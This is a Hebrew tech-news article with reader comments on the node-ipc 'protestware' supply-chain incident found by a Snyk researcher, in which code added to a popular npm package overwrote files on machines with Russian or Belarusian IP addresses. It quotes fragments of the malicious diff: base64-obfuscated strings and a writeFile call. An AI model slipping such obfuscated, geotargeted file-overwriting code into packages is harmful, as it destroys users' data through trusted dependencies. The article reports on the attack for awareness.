ישראלי גילה חבילת קוד פתוח פופולרית עם הפתעה לא נעימה למפתחים ברוסיה

לירן טל, חוקר אבטחת מידע מ-Snyk, גילה דרך מחאה חדשה, שמותחת את הגבול בין אקטיביזם דיגיטלי למתקפת סייבר

תמונה: Snyk

מאז החלה הפלישה הרוסית אל שטח אוקראינה, אנחנו עדים ללא מעט מחאות נגדה שכוללות גם התערבות של חברות טכנולוגיה שונות כמו עשרות חברות טכנולוגיה דוגמת אפל, שמפסיקות מכירות ופעילות בשוק הרוסי או אילון מאסק, שחיבר את אוקראינה לרשת האינטרנט הלוויינית שלו. המטרה של חברות הטכנולוגיה היתה כמובן ליצור לחץ כלכלי וציבורי ברוסיה, כדי לעצור את המתקפה, אבל בימים האחרונים התגלתה עוד מחאה, אך כזו שמטרגטת במיוחד מפתחים רוסיים.

במקום הקבצים שלכם – אימוג'י לב

בהנחה שאתם נעזרים מדי פעם בחבילות קוד פתוח, יש סיכוי לא רע שאתם משתמשים ב-node-ipc שזוכה למיליון הורדות בשבוע. אבל לפני שבועיים, הודיע המפתח שלה, הידוע בכינוי RIAEvangelist (ברנדון נוזקי מילר), כי יצר חבילה בשם peacenotwar, שכוללת לדבריו מחאה לא אלימה כנגד התוקפנות הרוסית. "המודול הזה יוסיף הודעה הקוראת לשלום על הדסקטופ של המשתמשים שלכם". עד ה-15 במרץ, החבילה הזאת כמובן לא זכתה להורדות, אבל מילר הוסיף ב-15 למרץ את המודול הזה כ-Dependency ל-node-ipc.

+      const n2 = Buffer.from("Li8=", "base64");
+      const o2 = Buffer.from("Li4v", "base64");
+      const r = Buffer.from("Li4vLi4v", "base64");
+      const f = Buffer.from("Lw==", "base64");
+      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
+      const e = Buffer.from("cnVzc2lh", "base64");
+      const i = Buffer.from("YmVsYXJ1cw==", "base64");

אם לא די בזה, גירסה 10.1.1 הכילה לפתע תוספת קוד משונה שביצעה קריאה למיקום של המשתמש, ובמקרה שאותו משתמש מזוהה כמשתמש בכתובת IP רוסית או בלארוסית, הופעל טיימר. ברגע שהטיימר הגיע לסיומו הפונקציה החלה למחוק את הקבצים שעל מחשב המשתמש, והחליפה אותם באמוג'י של לב. מאחר ומדובר בחבילה שמשמשת בתהליכי פיתוח רבים, זוהי בעצם סוג של מתקפת Supply Chain, שאם לא מגלים אותה בזמן, עשויה גם להגיע למחשבים של משתמשי קצה. המפתח אפילו ניסה לשחרר גירסה נוספת אחרי 10 שעות רק כדי לכפות עדכונים מרחוק לכאורה – אבל 5 שעות לאחר מכן גירסה חדשה שוחררה שכבר לא מכילה את הקוד הזדוני, וזאת לאחר שבגיטהאב כבר החלו לצוץ דיונים על הנושא. מאז, הוא הספיק לשחרר עוד גירסאות נוספות שמכילות את הקוד הזדוני.

+      try {
+        import_fs3.default.writeFile(i, c.toString("utf8"), function() {
+        });

"אתם יכולים לנעול את התלות (Dependency) שלכם לגירסה שלא כוללת את זה עד שמשהו יקרה עם המלחמה, כמו למשל שהיא תהפוך למלחמת עולם שלישית ויותר אנשים יתהו אם יכולנו לעשות משהו כדי למנוע את זה, או שהיא תסתיים ואני אוריד את זה", כתב מילר.

מי שאגב עלה על המהלך הזה הוא הוא לירן טל מחברת Snyk הישראלית, שכתב במחקר שפרסם: "גם אם המעשה המסוכן של RIAEvangelist יתקבל כאקט לגיטימי של מחאה, איך זה ישפיע על המוניטין העתידי של המתחזק בתוך קהילת הפיתוח? האם מישהו יאמין אי פעם למפתח הזה שהוא לא יפעל בצורה כזאת או אפילו אגרסיבית יותר בפרויקטים שהוא משתתף בהם?". התהייה הזו של החוקר הישראלי הופכת לרלוונטית יותר, כשרואים שמילר אחראי על עוד כ-40 חבילות, שרבות מהן זוכות ליותר ממיליון הורדות בשבוע, כך שכאמור, יש סיכוי לא קטן שאתם כבר משתמשים בחבילות שלו.


זוכרים שהאקרים התחילו לטרגט האקרים במאגר NPM?


תתחילו לנהל את ה-NPM שלכם

בינתיים, טל מזהיר משימוש בחבילות של מילר, ואם אתם ממש חייבים, פשוט דלגו לחלוטין על הגירסאות הזדוניות. Snyk עצמה כבר הספיקה לפתוח CVE בנושא (וגם כמובן לקדם את הפלטפורמה שלה שעודכנה כדי לזהות את הפעולות הללו) אך מבקשת להזהיר בפעם המי-יודע-כמה מפני ניהול מרושל שמוביל למתקפות שרשרת-אספקה, שהפכו לשכיחות בשנים האחרונות, וכנראה יהפכו לעוד יותר שכיחות ככל שהתלות בקוד פתוח וחבילות חיצוניות תגבר.

המקרה הזה הוא לא השימוש היחידי במה שמכונה "Protestware", ועד כה זוהו יותר מ-20 חבילות שמבצעות שלל פעולות מחאה כמו שורות קוד שקוראות לשלום ולעצירתו של פוטין. בין אם נראה התופעה תגבר עם המשך הלחימה, היא עוד דוגמה אחת מני רבות שמעידה על הבעייתיות שקיימת לצד היתרונות הרבים שקיימים בקוד פתוח.

עוד סיפורים כאלו מחכים לכם עכשיו עוד סיפורים כאלו מחכים לכם עכשיו בערוץ העדכונים הרשמי של גיקטיים

עידן בן טובים

נולד עם ג׳ויסטיק ביד. יש לו הרבה יותר מדי גאדג׳טים והרבה פחות מדי זמן פנוי כדי לשחק עם כולם. בעל פטיש לא מוסבר לביצוע קליברציות לסוללות של מכשירים. כשהוא לא עסוק בלכתוב על טכנולוגיה, הוא אוהב לדבר עליה, והרבה

הגב

12 תגובות על "ישראלי גילה חבילת קוד פתוח פופולרית עם הפתעה לא נעימה למפתחים ברוסיה"

avatar
Photo and Image Files
 
 
 
Audio and Video Files
 
 
 
Other File Types
 
 
 

* היי, אנחנו אוהבים תגובות!
תיקונים, תגובות קוטלות וכמובן תגובות מפרגנות - בכיף.
חופש הביטוי הוא ערך עליון, אבל לא נוכל להשלים עם תגובות שכוללות הסתה, הוצאת דיבה, תגובות שכוללות מידע המפר את תנאי השימוש של Geektime, תגובות שחורגות מהטעם הטוב ותגובות שהן בניגוד לדין. תגובות כאלו יימחקו מייד.

סידור לפי:   חדש | ישן | הכי מדורגים
שלמה
Guest
"המטרה של חברות הטכנולוגיה היתה כמובן ליצור לחץ כלכלי וציבורי ברוסיה, כדי לעצור את המתקפה" ממש לא נכון, החברות נתונות לסנקציות ולחץ חברתי נגד רוסיה ולכן פועלות בהתאם. חוץ מזה זה מצוין ליח"צ, חברות שונות יכולות לעשות ניסויים בשטח עם מוצרים, לפתוח עוד שווקים ועוד… זו הסיבה המרכזית. איני מבין מדוע מגיע לכל הרוסים עונש קולקטיבי, גם מחאה של מיליוני תושבים רוסים נגד הממשל לא תעזור נגד משטר דיקטטורי, איפכא מסתברא, המשטר יהפוך לקיצוני יותר. מה אם אותם מפתחים למעשה נגד המשטר של פוטין? בלי קשר לכתבה: אני מקווה שיפסיקו לעשות השוואות בין השואה למה שקורה באוקראינה, בנוסף הרבה אנשים… Read more »
גד לנסקי
Guest

זה פשוט נוראי ובעיקר צבוע ואני מקווה שהבחור הזה יאבד את הקרדיט שיש לו. לא כל אזרח רוסי הוא איזה קצין בצבא או דיפלומט שלוקח חלק במלחמה הזאת, רובם בטח המפתחים שביניהם מתעניינים במלחמה כמו שהם מתעניינים במלחמת סעודיה תימן. ולכל מי ששש לראות את השנאה לרוסים שיחשוב מה יקרה בפעם הבאה שיהיה מבצע בעזה כשאצלינו בניגוד לרוסים חלק לא מבוטל מהמפתחים שירת באופן משמעותי בצבא.

אא123
Guest

מה זה npm? סליחה על הבורות

yoni
Guest

אתר / פקודה לניהול חבילות ל-NodeJS

מתכנת?
Guest

מי שלא שם לב, גם composer של php מציגים הודעה של תמיכה באוקראינים (אבל רק הודעה ותו לא).

תומר
Guest
זה טרלול פרוגרסיבי שלא מבחין בין אינדיבידואלים לשלטון. שלא לדבר על ביצוע פשע אתי מדרגה ראשונה (ניצול האמון שנותנים בך). קוד פתוח נועד לשימוש הקהילה – לא כדי לקדם מפתח כזה או אחר (או אפילו אידאולוגיה כלשהי). ברגע שמפתח מנצל את התלות של הקהילה בו כדי לכפות עליהם את דעתו (הצודקת או לא – זה לא משנה בכלל) – זו בגידה יסודית באמון של הקהילה! בנוסף, המחאה הזו שמכוונת כלפי כל מי שרוסי או בלרוסי בגלל המוצא שלו ולא בגלל דיעותיו – זו פשוט גזענות. ובכלל, למה לעזאזל מפתחים/חברות/תאגידים חושבים שהם מבינים משהו בדיפלומטיה או חוקי מלחמה או סתם פוליטיקה… Read more »
Senor Senior
Guest

יאללה יא בכיין

יצחק כהן
Guest

ב"ה

קוד חייב להיות מחוץ למשחק הפוליטי

אחרת כל אחד יכניס את הדעות שלו ויצא מלחמת תעמולה שיכולה להשבית מערכותמחיוניות ולגרום אפילו למוות או תאונות קשות

כמו שעד עכשיו הקוד שמר על נטרליות גם במדינות טרור, כך פרוייקט קוד פתוח חייב להמשיך, אחרת לא תיהיה ברירה ונצטרך "תעודת הכשר" חתומה על כל חבילה, מה שיגרום אטיות רבה בתהליך הפיתוח וכמובן יפגע בקדמה

אא א
Guest

לא הבנתי איך אפשר להמנע מ"תקיפות" כאלו?

שם כלשהו
Guest

גם אם נניח שזה לגיטימי, איך אפשר להמיש לסמוך על הפצה שמרה לעצמה לעשות נזק למשתמש כלשהו? היום הם החליטו לפגוע במשתמשים הרוסים, מחר הם יחליטו לעשות אותו דבר לישראל בעקבות פעולה צבאית כזאת או אחרת, או סתם כי משעמם להם.

יהונתן
Guest

מפתח מטומטם וחצוף. רוצה לפגוע ברוסים שיעשה את זה באופן ישיר ולא יזריק לאפליקציה שלי קוד שפוגע בלקוחות שלי. מקווה שאנשים יזהרו ויחרימו את החבילות שהדביל מפרסם. לטובתם

סיימון
Guest

אתה חצוף, תתרום קוד לפני שאתה פותח פה , כל אחד שלוקח ספריה נהיה פילוסוף, לא מתאים לך תעשה פורק ותתחיל לתקן לעבוד ולתרום חזרה , הוא לא עובד אצלך ,קוד שלו , אתה עצלן ונצלן.
עושים יח״צ על גב של מתכנת.

wpDiscuz

תגיות לכתבה: